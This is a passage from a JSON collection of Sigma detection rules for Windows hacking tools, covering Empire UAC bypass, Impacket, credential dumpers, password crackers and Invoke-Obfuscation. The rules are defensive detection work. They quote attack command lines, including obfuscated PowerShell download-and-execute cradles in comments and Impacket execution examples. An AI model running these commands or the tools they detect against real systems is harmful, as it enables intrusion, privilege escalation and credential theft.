    "content": "title: HackTool - Empire PowerShell UAC Bypass\nid: 3268b746-88d8-4cd3-bffc-30077d02c787\nstatus: stable\ndescription: Detects some Empire PowerShell UAC bypass methods\nreferences:\n    - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64\n    - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64\nauthor: Ecco\ndate: 2019-08-30\nmodified: 2023-02-21\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\n    - car.2019-04-001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - ' -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update)'\n            - ' -NoP -NonI -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update);'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_evil_winrm.yml",
    "content": "title: HackTool - WinRM Access Via Evil-WinRM\nid: a197e378-d31b-41c0-9635-cfdf1c1bb423\nstatus: test\ndescription: Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-3---winrm-access-with-evil-winrm\n    - https://github.com/Hackplayers/evil-winrm\nauthor: frack113\ndate: 2022-01-07\nmodified: 2023-02-13\ntags:\n    - attack.lateral-movement\n    - attack.t1021.006\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\ruby.exe'\n        CommandLine|contains|all:\n            - '-i '\n            - '-u '\n            - '-p '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_execution_via_imphashes.yml",
    "content": "title: Hacktool Execution - Imphash\nid: 24e3e58a-646b-4b50-adef-02ef935b9fc8\nstatus: test\ndescription: Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-04\nmodified: 2024-11-23\ntags:\n    - attack.credential-access\n    - attack.resource-development\n    - attack.t1588.002\n    - attack.t1003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Hashes|contains: # Sysmon field hashes contains all types\n            - IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932 # PetitPotam\n            - IMPHASH=3A19059BD7688CB88E70005F18EFC439 # PetitPotam\n            - IMPHASH=bf6223a49e45d99094406777eb6004ba # PetitPotam\n            - IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1 # JuicyPotato\n            - IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC # JuicyPotato\n            - IMPHASH=F9A28C458284584A93B14216308D31BD # JuicyPotatoNG\n            - IMPHASH=6118619783FC175BC7EBECFF0769B46E # RoguePotato\n            - IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA # RoguePotato\n            - IMPHASH=563233BFA169ACC7892451F71AD5850A # RoguePotato\n            - IMPHASH=87575CB7A0E0700EB37F2E3668671A08 # RoguePotato\n            - IMPHASH=13F08707F759AF6003837A150A371BA1 # Pwdump\n            - IMPHASH=1781F06048A7E58B323F0B9259BE798B # Pwdump\n            - IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5 # Pwdump\n            - IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D # Pwdump\n            - IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2 # Pwdump\n            - IMPHASH=713C29B396B907ED71A72482759ED757 # Pwdump\n            - IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F # Pwdump\n            - IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E # Pwdump\n            - IMPHASH=8B114550386E31895DFAB371E741123D # Pwdump\n            - IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793 # PwDumpX\n   
         - IMPHASH=9D68781980370E00E0BD939EE5E6C141 # Pwdump\n            - IMPHASH=B18A1401FF8F444056D29450FBC0A6CE # Pwdump\n            - IMPHASH=CB567F9498452721D77A451374955F5F # Pwdump\n            - IMPHASH=730073214094CD328547BF1F72289752 # Htran\n            - IMPHASH=17B461A082950FC6332228572138B80C # Cobalt Strike beacons\n            - IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9 # Cobalt Strike beacons\n            - IMPHASH=819B19D53CA6736448F9325A85736792 # Cobalt Strike beacons\n            - IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E # Cobalt Strike beacons\n            - IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74 # PPLDump\n            - IMPHASH=0588081AB0E63BA785938467E1B10CCA # PPLDump\n            - IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C # NanoDump\n            - IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29 # NanoDump\n            - IMPHASH=4DA924CF622D039D58BCE71CDF05D242 # NanoDump\n            - IMPHASH=E7A3A5C377E2D29324093377D7DB1C66 # NanoDump\n            - IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF # NanoDump\n            - IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE # NanoDump\n            - IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4 # NanoDump\n            - IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338 # NanoDump\n            - IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E # NanoDump\n            - IMPHASH=E6F9D5152DA699934B30DAAB206471F6 # NanoDump\n            - IMPHASH=3AD59991CCF1D67339B319B15A41B35D # NanoDump\n            - IMPHASH=FFDD59E0318B85A3E480874D9796D872 # NanoDump\n            - IMPHASH=0CF479628D7CC1EA25EC7998A92F5051 # NanoDump\n            - IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51 # NanoDump\n            - IMPHASH=D6D0F80386E1380D05CB78E871BC72B1 # NanoDump\n            - IMPHASH=38D9E015591BBFD4929E0D0F47FA0055 # HandleKatz\n            - IMPHASH=0E2216679CA6E1094D63322E3412D650 # HandleKatz\n            - IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB # DripLoader\n            - IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798 # DripLoader\n           
 - IMPHASH=11083E75553BAAE21DC89CE8F9A195E4 # DripLoader\n            - IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80 # DripLoader\n            - IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F # CreateMiniDump\n            - IMPHASH=767637C23BB42CD5D7397CF58B0BE688 # UACMe Akagi\n            - IMPHASH=14C4E4C72BA075E9069EE67F39188AD8 # UACMe Akagi\n            - IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC # UACMe Akagi\n            - IMPHASH=7D010C6BB6A3726F327F7E239166D127 # UACMe Akagi\n            - IMPHASH=89159BA4DD04E4CE5559F132A9964EB3 # UACMe Akagi\n            - IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F # UACMe Akagi\n            - IMPHASH=5834ED4291BDEB928270428EBBAF7604 # UACMe Akagi\n            - IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38 # UACMe Akagi\n            - IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894 # UACMe Akagi\n            - IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74 # UACMe Akagi\n            - IMPHASH=3DE09703C8E79ED2CA3F01074719906B # UACMe Akagi\n            - IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F # WCE\n            - IMPHASH=E96A73C7BF33A464C510EDE582318BF2 # WCE\n            - IMPHASH=32089B8851BBF8BC2D014E9F37288C83 # Sliver Stagers\n            - IMPHASH=09D278F9DE118EF09163C6140255C690 # Dumpert\n            - IMPHASH=03866661686829d806989e2fc5a72606 # Dumpert\n            - IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d # Dumpert\n            - IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte\n            - IMPHASH=19584675D94829987952432E018D5056 # SysmonQuiet\n            - IMPHASH=330768A4F172E10ACB6287B87289D83B # ShaprEvtMute Hook\n            - IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313 # Forkatz\n            - IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC # PPLKiller\n            - IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28 # PPLKiller\n            - IMPHASH=96DF3A3731912449521F6F8D183279B1 # Backstab\n            - IMPHASH=7E6CF3FF4576581271AC8A313B2AAB46 # Backstab\n            - IMPHASH=51791678F351C03A0EB4E2A7B05C6E17 # Backstab\n            - 
IMPHASH=25CE42B079282632708FC846129E98A5 # Forensia\n            - IMPHASH=021BCCA20BA3381B11BDDE26B4E62F20 # EDRSandBlast\n            - IMPHASH=59223B5F52D8799D38E0754855CBDF42 # EDRSandBlast\n            - IMPHASH=81E75D8F1D276C156653D3D8813E4A43 # EDRSandBlast\n            - IMPHASH=17244E8B6B8227E57FE709CCAD421420 # EDRSandBlast\n            - IMPHASH=5B76DA3ACDEDC8A5CDF23A798B5936B4 # EDRSandBlast\n            - IMPHASH=CB2B65BB77D995CC1C0E5DF1C860133C # EDRSandBlast\n            - IMPHASH=40445337761D80CF465136FAFB1F63E6 # EDRSandBlast\n            - IMPHASH=8A790F401B29FA87BC1E56F7272B3AA6 # EDRSilencer\n            - IMPHASH=B50199E952C875241B9CE06C971CE3C1 # EventLogCrasher\n    condition: selection\nfalsepositives:\n    - Legitimate use of one of these tools\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_execution_via_pe_metadata.yml",
    "content": "title: Hacktool Execution - PE Metadata\nid: 37c1333a-a0db-48be-b64b-7393b2386e3b\nstatus: test\ndescription: Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed\nreferences:\n    - https://github.com/cube0x0\n    - https://www.virustotal.com/gui/search/metadata%253ACube0x0/files\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-04-27\nmodified: 2024-01-15\ntags:\n    - attack.credential-access\n    - attack.resource-development\n    - attack.t1588.002\n    - attack.t1003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Company: 'Cube0x0' # Detects the use of tools created by a well-known hacktool producer named \"Cube0x0\", which includes his handle in all binaries as company information in the PE headers (SharpPrintNightmare, KrbRelay, SharpMapExec, etc.)\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_gmer.yml",
    "content": "title: HackTool - GMER Rootkit Detector and Remover Execution\nid: 9082ff1f-88ab-4678-a3cc-5bcff99fc74d\nstatus: test\ndescription: Detects the execution of the GMER tool based on image and hash fields.\nreferences:\n    - http://www.gmer.net/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-05\nmodified: 2024-11-23\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\gmer.exe'\n    selection_sysmon_hash:\n        Hashes|contains:\n            - 'MD5=E9DC058440D321AA17D0600B3CA0AB04'\n            - 'SHA1=539C228B6B332F5AA523E5CE358C16647D8BBE57'\n            - 'SHA256=E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_handlekatz.yml",
    "content": "title: HackTool - HandleKatz LSASS Dumper Execution\nid: ca621ba5-54ab-4035-9942-d378e6fcde3c\nstatus: test\ndescription: Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same\nreferences:\n    - https://github.com/codewhitesec/HandleKatz\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-08-18\nmodified: 2024-11-23\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_loader_img:\n        Image|endswith: '\\loader.exe'\n        CommandLine|contains: '--pid:'\n    selection_loader_imphash:\n        Hashes|contains:\n            - 'IMPHASH=38D9E015591BBFD4929E0D0F47FA0055'\n            - 'IMPHASH=0E2216679CA6E1094D63322E3412D650'\n    selection_flags:\n        CommandLine|contains|all:\n            - '--pid:'\n            - '--outfile:'\n        CommandLine|contains:\n            - '.dmp'\n            - 'lsass'\n            - '.obf'\n            - 'dump'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_hashcat.yml",
    "content": "title: HackTool - Hashcat Password Cracker Execution\nid: 39b31e81-5f5f-4898-9c0e-2160cfc0f9bf\nstatus: test\ndescription: Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.002/T1110.002.md#atomic-test-1---password-cracking-with-hashcat\n    - https://hashcat.net/wiki/doku.php?id=hashcat\nauthor: frack113\ndate: 2021-12-27\nmodified: 2023-02-04\ntags:\n    - attack.credential-access\n    - attack.t1110.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\hashcat.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - '-a '\n            - '-m 1000 '\n            - '-r '\n    condition: 1 of selection_*\nfalsepositives:\n    - Tools that use similar command line flags and values\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_hollowreaper.yml",
    "content": "title: HackTool - HollowReaper Execution\nid: 85d23b42-9a9d-4f8f-b3d7-d2733c1d58f5\nstatus: experimental\ndescription: |\n    Detects usage of HollowReaper, a process hollowing shellcode launcher used for stealth payload execution through process hollowing.\n    It replaces the memory of a legitimate process with custom shellcode, allowing the attacker to execute payloads under the guise of trusted binaries.\nreferences:\n    - https://github.com/vari-sh/RedTeamGrimoire/tree/b5e7635d34db6e1f0398d8847e8f293186e947c5/HollowReaper\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-07-01\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1055.012\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\HollowReaper.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_htran_or_natbypass.yml",
    "content": "title: HackTool - Htran/NATBypass Execution\nid: f5e3b62f-e577-4e59-931e-0a15b2b94e1e\nstatus: test\ndescription: Detects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass)\nreferences:\n    - https://github.com/HiwinCN/HTran\n    - https://github.com/cw1997/NATBypass\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-12-27\nmodified: 2023-02-04\ntags:\n    - attack.command-and-control\n    - attack.t1090\n    - attack.s0040\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith:\n            - '\\htran.exe'\n            - '\\lcx.exe'\n    selection_cli:\n        CommandLine|contains:\n            - '.exe -tran '\n            - '.exe -slave '\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_hydra.yml",
    "content": "title: HackTool - Hydra Password Bruteforce Execution\nid: aaafa146-074c-11eb-adc1-0242ac120002\nstatus: test\ndescription: Detects command line parameters used by Hydra password guessing hack tool\nreferences:\n    - https://github.com/vanhauser-thc/thc-hydra\nauthor: Vasiliy Burov\ndate: 2020-10-05\nmodified: 2023-02-04\ntags:\n    - attack.credential-access\n    - attack.t1110\n    - attack.t1110.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '-u '\n            - '-p '\n        CommandLine|contains:\n            - '^USER^'\n            - '^PASS^'\n    condition: selection\nfalsepositives:\n    - Software that uses the caret encased keywords PASS and USER in its command line\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_impacket_lateral_movement.yml",
    "content": "title: HackTool - Potential Impacket Lateral Movement Activity\nid: 10c14723-61c7-4c75-92ca-9af245723ad2\nrelated:\n    - id: e31f89f7-36fb-4697-8ab6-48823708353b\n      type: obsolete\nstatus: stable\ndescription: Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework\nreferences:\n    - https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/wmiexec.py\n    - https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py\n    - https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py\n    - https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/dcomexec.py\n    - https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html\nauthor: Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch\ndate: 2019-09-03\nmodified: 2023-02-21\ntags:\n    - attack.execution\n    - attack.t1047\n    - attack.lateral-movement\n    - attack.t1021.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_other:\n        # *** wmiexec.py\n        #    parent is wmiprvse.exe\n        #    examples:\n        #       cmd.exe /Q /c whoami 1> \\\\127.0.0.1\\ADMIN$\\__1567439113.54 2>&1\n        #       cmd.exe /Q /c cd  1> \\\\127.0.0.1\\ADMIN$\\__1567439113.54 2>&1\n        # *** dcomexec.py -object MMC20\n        #   parent is mmc.exe\n        #   example:\n        #       \"C:\\Windows\\System32\\cmd.exe\" /Q /c cd  1> \\\\127.0.0.1\\ADMIN$\\__1567442499.05 2>&1\n        # *** dcomexec.py -object ShellBrowserWindow\n        #  runs %SystemRoot%\\System32\\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c08afd90-f2a1-11d1-8455-00a0c91f3880} but parent command is explorer.exe\n        #  example:\n        #   \"C:\\Windows\\System32\\cmd.exe\" /Q /c cd \\ 1> \\\\127.0.0.1\\ADMIN$\\__1567520103.71 2>&1\n        # *** smbexec.py\n        #   parent is services.exe\n        #   example:\n        #       C:\\Windows\\system32\\cmd.exe /Q /c echo tasklist ^> \\\\127.0.0.1\\C$\\__output 2^>^&1 > C:\\Windows\\TEMP\\execute.bat & C:\\Windows\\system32\\cmd.exe /Q /c C:\\Windows\\TEMP\\execute.bat & del C:\\Windows\\TEMP\\execute.bat\n        ParentImage|endswith:\n            - '\\wmiprvse.exe'        # wmiexec\n            - '\\mmc.exe'        # dcomexec MMC\n            - '\\explorer.exe'        # dcomexec ShellBrowserWindow\n            - '\\services.exe'        # smbexec\n        CommandLine|contains|all:\n            - 'cmd.exe'\n            - '/Q'\n            - '/c'\n            - '\\\\\\\\127.0.0.1\\\\'\n            - '&1'\n    selection_atexec:\n        ParentCommandLine|contains:\n            - 'svchost.exe -k netsvcs'       # atexec on win10 (parent is \"C:\\Windows\\system32\\svchost.exe -k netsvcs\")\n            - 'taskeng.exe'       # atexec on win7 (parent is \"taskeng.exe {AFA79333-694C-4BEE-910E-E57D9A3518F6} S-1-5-18:NT AUTHORITY\\System:Service:\")\n            # cmd.exe /C tasklist /m > C:\\Windows\\Temp\\bAJrYQtL.tmp 2>&1\n        CommandLine|contains|all:\n            - 'cmd.exe'\n            - '/C'\n            - 'Windows\\Temp\\'\n            - '&1'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_impacket_tools.yml",
    "content": "title: HackTool - Impacket Tools Execution\nid: 4627c6ae-6899-46e2-aa0c-6ebcb1becd19\nstatus: test\ndescription: Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)\nreferences:\n    - https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-07-24\nmodified: 2023-02-07\ntags:\n    - attack.collection\n    - attack.execution\n    - attack.credential-access\n    - attack.t1557.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|contains:\n              - '\\goldenPac'\n              - '\\karmaSMB'\n              - '\\kintercept'\n              - '\\ntlmrelayx'\n              - '\\rpcdump'\n              - '\\samrdump'\n              - '\\secretsdump'\n              - '\\smbexec'\n              - '\\smbrelayx'\n              - '\\wmiexec'\n              - '\\wmipersist'\n        - Image|endswith:\n              - '\\atexec_windows.exe'\n              - '\\dcomexec_windows.exe'\n              - '\\dpapi_windows.exe'\n              - '\\findDelegation_windows.exe'\n              - '\\GetADUsers_windows.exe'\n              - '\\GetNPUsers_windows.exe'\n              - '\\getPac_windows.exe'\n              - '\\getST_windows.exe'\n              - '\\getTGT_windows.exe'\n              - '\\GetUserSPNs_windows.exe'\n              - '\\ifmap_windows.exe'\n              - '\\mimikatz_windows.exe'\n              - '\\netview_windows.exe'\n              - '\\nmapAnswerMachine_windows.exe'\n              - '\\opdump_windows.exe'\n              - '\\psexec_windows.exe'\n              - '\\rdp_check_windows.exe'\n              - '\\sambaPipe_windows.exe'\n              - '\\smbclient_windows.exe'\n              - '\\smbserver_windows.exe'\n              - '\\sniff_windows.exe'\n              - '\\sniffer_windows.exe'\n              - '\\split_windows.exe'\n              - '\\ticketer_windows.exe'\n              # - '\\addcomputer_windows.exe'\n              # - '\\esentutl_windows.exe'\n              # - '\\getArch_windows.exe'\n              # - '\\lookupsid_windows.exe'\n              # - '\\mqtt_check_windows.exe'\n              # - '\\mssqlclient_windows.exe'\n              # - '\\mssqlinstance_windows.exe'\n              # - '\\ntfs-read_windows.exe'\n              # - '\\ping_windows.exe'\n              # - '\\ping6_windows.exe'\n              # - '\\raiseChild_windows.exe'\n              # - '\\reg_windows.exe'\n              # - '\\registry-read_windows.exe'\n              # - '\\services_windows.exe'\n              # - '\\wmiquery_windows.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use of the impacket tools\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_impersonate.yml",
    "content": "title: HackTool - Impersonate Execution\nid: cf0c254b-22f1-4b2b-8221-e137b3c0af94\nstatus: test\ndescription: Detects execution of the Impersonate tool, which can be used to manipulate tokens on Windows computers remotely (PsExec/WmiExec) or interactively\nreferences:\n    - https://sensepost.com/blog/2022/abusing-windows-tokens-to-compromise-active-directory-without-touching-lsass/\n    - https://github.com/sensepost/impersonate\nauthor: Sai Prashanth Pulisetti @pulisettis\ndate: 2022-12-21\nmodified: 2024-11-23\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1134.001\n    - attack.t1134.003\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_commandline_exe:\n        CommandLine|contains: 'impersonate.exe'\n    selection_commandline_opt:\n        CommandLine|contains:\n            - ' list '\n            - ' exec '\n            - ' adduser '\n    selection_hash:\n        Hashes|contains:\n            - 'MD5=9520714AB576B0ED01D1513691377D01'\n            - 'SHA256=E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A'\n            - 'IMPHASH=0A358FFC1697B7A07D0E817AC740DF62'\n    condition: all of selection_commandline_* or selection_hash\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_inveigh.yml",
    "content": "title: HackTool - Inveigh Execution\nid: b99a1518-1ad5-4f65-bc95-1ffff97a8fd0\nstatus: test\ndescription: Detects the use of Inveigh, a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool\nreferences:\n    - https://github.com/Kevin-Robertson/Inveigh\n    - https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-24\nmodified: 2023-02-04\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\Inveigh.exe'\n        - OriginalFileName:\n              - '\\Inveigh.exe'\n              - '\\Inveigh.dll'\n        - Description: 'Inveigh'\n        - CommandLine|contains:\n              - ' -SpooferIP'\n              - ' -ReplyToIPs '\n              - ' -ReplyToDomains '\n              - ' -ReplyToMACs '\n              - ' -SnifferIP'\n    condition: selection\nfalsepositives:\n    - Very unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_clip.yml",
    "content": "title: Invoke-Obfuscation CLIP+ Launcher\nid: b222df08-0e07-11eb-adc1-0242ac120002\nstatus: test\ndescription: Detects Obfuscated use of Clip.exe to execute PowerShell\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task 26)\nauthor: Jonathan Cheong, oscd.community\ndate: 2020-10-13\nmodified: 2022-11-17\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # CommandLine|re: 'cmd.{0,5}(?:\\/c|\\/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\\\"\\{\\d\\}.+\\-f.+\\\"'\n        # Example 1: Cmd /c\" echo/Invoke-Expression (New-Object Net.WebClient).DownloadString |cLiP&& POWerSheLl -Nolog -sT . (\\\"{1}{2}{0}\\\"-f'pe','Ad',(\\\"{1}{0}\\\" -f'Ty','d-' ) ) -Assemb ( \\\"{5}{1}{3}{0}{2}{4}\\\" -f'ows','y','.F',(\\\"{0}{1}{2}\\\" -f'stem.W','i','nd'),( \\\"{0}{1}\\\"-f 'o','rms' ),'S' ) ; ([SySTEM.wiNDows.FoRmS.CLiPbOArd]::( \\\"{1}{0}\\\" -f (\\\"{1}{0}\\\" -f'T','TTeX' ),'gE' ).\\\"invO`Ke\\\"( ) ) ^| ^&( \\\"{5}{1}{2}{4}{3}{0}\\\" -f 'n',( \\\"{1}{0}\\\"-f'KE-','o' ),(\\\"{2}{1}{0}\\\"-f 'pRESS','x','e' ),'o','i','iNV') ; [System.Windows.Forms.Clipboard]::(\\\"{0}{1}\\\" -f( \\\"{1}{0}\\\"-f'e','SetT' ),'xt').\\\"InV`oKe\\\"( ' ')\"\n        # Example 2: CMD/c \" ECho Invoke-Expression (New-Object Net.WebClient).DownloadString|c:\\WiNDowS\\SySteM32\\cLip && powershElL -noPRO -sTa ^& (\\\"{2}{0}{1}\\\" -f 'dd',(\\\"{1}{0}\\\"-f 'ype','-T' ),'A' ) -AssemblyN (\\\"{0}{3}{2}{1}{4}\\\"-f'Pr','nCo',(\\\"{0}{1}\\\"-f'e','ntatio'),'es','re' ) ; ^& ( ( [StRinG]${ve`RB`OSE`pr`e`FeReNCE} )[1,3] + 'x'-JoiN'') ( ( [sySTem.WInDOWs.ClipbOaRD]::( \\\"{1}{0}\\\" -f(\\\"{0}{1}\\\" -f'tTe','xt' ),'ge' ).\\\"IN`Vo`Ke\\\"( ) ) ) ; [System.Windows.Clipboard]::( \\\"{2}{1}{0}\\\" -f't',( \\\"{0}{1}\\\" -f 'tT','ex' ),'Se' ).\\\"In`V`oKe\\\"( ' ' )\"\n        CommandLine|contains|all:\n            - 'cmd'\n            - '&&'\n            - 'clipboard]::'\n            - '-f'\n        CommandLine|contains:\n            - '/c'\n            - '/r'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml",
    "content": "title: Invoke-Obfuscation Obfuscated IEX Invocation\nid: 4bf943c6-5146-4273-98dd-e958fd1e3abf\nstatus: test\ndescription: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block\nreferences:\n    - https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888\nauthor: 'Daniel Bohannon (@Mandiant/@FireEye), oscd.community'\ndate: 2019-11-08\nmodified: 2022-12-31\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - CommandLine|re: '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\['\n        - CommandLine|re: '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\['\n        - CommandLine|re: '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\['\n        - CommandLine|re: '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}'\n        - CommandLine|re: '\\*mdr\\*\\W\\s*\\)\\.Name'\n        - CommandLine|re: '\\$VerbosePreference\\.ToString\\('\n        - CommandLine|re: '\\[String\\]\\s*\\$VerbosePreference'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_stdin.yml",
